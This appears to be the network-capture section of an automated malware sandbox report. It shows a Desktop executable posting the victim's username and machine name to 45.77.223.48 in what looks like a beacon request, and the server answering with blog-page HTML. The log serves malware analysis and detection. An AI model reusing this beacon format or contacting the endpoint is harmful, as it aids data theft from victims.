Apr 26, 2024 04:43:46.334182024 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.149636030 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.149755001 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.149914026 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.149979115 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.159240007 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.159306049 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.159492016 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.159543037 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.159635067 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.159677982 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.159763098 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.159868002 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.160090923 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.160150051 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.160171986 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.160221100 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.160248041 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.160296917 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.291969061 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.337593079 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.337671995 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.337677002 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.337723970 CEST	80	49809	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.337733984 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.337816000 CEST	49809	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.479212046 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.479314089 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.482326984 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.670836926 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:47.670917034 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:47.857302904 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:48.644124031 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:48.644233942 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:48.644273043 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:48.644354105 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:48.645564079 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:48.687594891 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:48.687644958 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:48.687685966 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:48.687721014 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:48.687764883 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:48.687777042 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:48.687777042 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:48.687803984 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:48.687916994 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:48.687972069 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:48.687973022 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:48.688009977 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:48.688024044 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:48.688056946 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:48.789515018 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:48.832397938 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:48.832479954 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:48.832492113 CEST	80	49810	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:48.832596064 CEST	49810	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:48.978180885 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:48.978349924 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:48.980951071 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:49.170912027 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:49.171013117 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:49.359453917 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.099724054 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.099917889 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.100467920 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.100524902 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.109718084 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.109771013 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.110168934 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.110205889 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.110214949 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.110253096 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.110377073 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.110420942 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.111219883 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.111262083 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.111264944 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.111299992 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.111300945 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.111341953 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.111448050 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.111488104 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.239572048 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.288882017 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.288953066 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.289144039 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.289197922 CEST	80	49811	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.289203882 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.289258003 CEST	49811	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.429337978 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.429497957 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.432496071 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.620327950 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:50.620397091 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:50.808887959 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.496342897 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.496465921 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.496737957 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.496738911 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.505086899 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.505152941 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.505549908 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.505614042 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.505618095 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.505680084 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.505705118 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.505764008 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.505934000 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.505999088 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.506087065 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.506149054 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.506170988 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.506231070 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.685005903 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.685062885 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.685128927 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.685201883 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.693486929 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.693608999 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.693624020 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.693701029 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.706311941 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.706409931 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.706548929 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.706918001 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.706976891 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.707220078 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.707266092 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.722162962 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.722235918 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.722840071 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.722901106 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.732666016 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.732758045 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.732804060 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.732835054 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.852818966 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.872334957 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.872447014 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.875861883 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.875947952 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.882411003 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.882504940 CEST	80	49812	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:51.882529974 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:51.882565975 CEST	49812	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:52.041007042 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:52.041136980 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:52.043340921 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:52.230941057 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:52.231024027 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:52.419110060 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.183917046 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.183980942 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.184017897 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.184046030 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.192580938 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.192667007 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.192883968 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.192994118 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.193042040 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.193069935 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.193280935 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.193332911 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.193393946 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.193432093 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.193481922 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.381514072 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.381575108 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.381640911 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.388140917 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.388181925 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.388235092 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.401189089 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.401281118 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.401346922 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.414511919 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.414597988 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.414654016 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.427871943 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.427963018 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.428047895 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.441349030 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.441387892 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.441462994 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.454571009 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.454611063 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.454664946 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.468163967 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.468267918 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.468369961 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.481554985 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.481647015 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.481750965 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.494338989 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.494431973 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.494498968 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.570029020 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.570132971 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.570189953 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.576787949 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.576828003 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.576895952 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.589601994 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.589672089 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.589728117 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.602947950 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.603019953 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.603089094 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.616379023 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.616481066 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.616708040 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.629492998 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.629559040 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.629615068 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.642661095 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.642716885 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.642813921 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.655822039 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.655937910 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.656047106 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.668878078 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.668920040 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.669028997 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.680835009 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.680893898 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.680994034 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.692082882 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.692193031 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.692249060 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.702702045 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.702826023 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.702975988 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:53.713257074 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.713320017 CEST	80	49813	45.77.223.48	192.168.2.4
Apr 26, 2024 04:43:53.713378906 CEST	49813	80	192.168.2.4	45.77.223.48
Apr 26, 2024 04:43:57.171253920 CEST	49813	80	192.168.2.4	45.77.223.48

HTTP Request Dependency Graph

45.77.223.48

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49735	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:02.935480118 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 176 Connection: close
Apr 26, 2024 04:42:03.130712032 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones123716JONES-PCk0FDD42EE188E931437F4FBE2CHzmFz
Apr 26, 2024 04:42:04.099225044 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:03 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:04.099849939 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:04.099992037 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:04.109543085 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:04.109834909 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:04.110028028 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:04.110044003 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:04.110208035 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:04.110270977 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:04.110337973 CEST	761	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:04.426692009 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 176 Connection: close
Apr 26, 2024 04:42:04.614386082 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones123716JONES-PC+0FDD42EE188E931437F4FBE2Cja9Cl
Apr 26, 2024 04:42:05.587521076 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:04 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:05.587862015 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:05.587946892 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
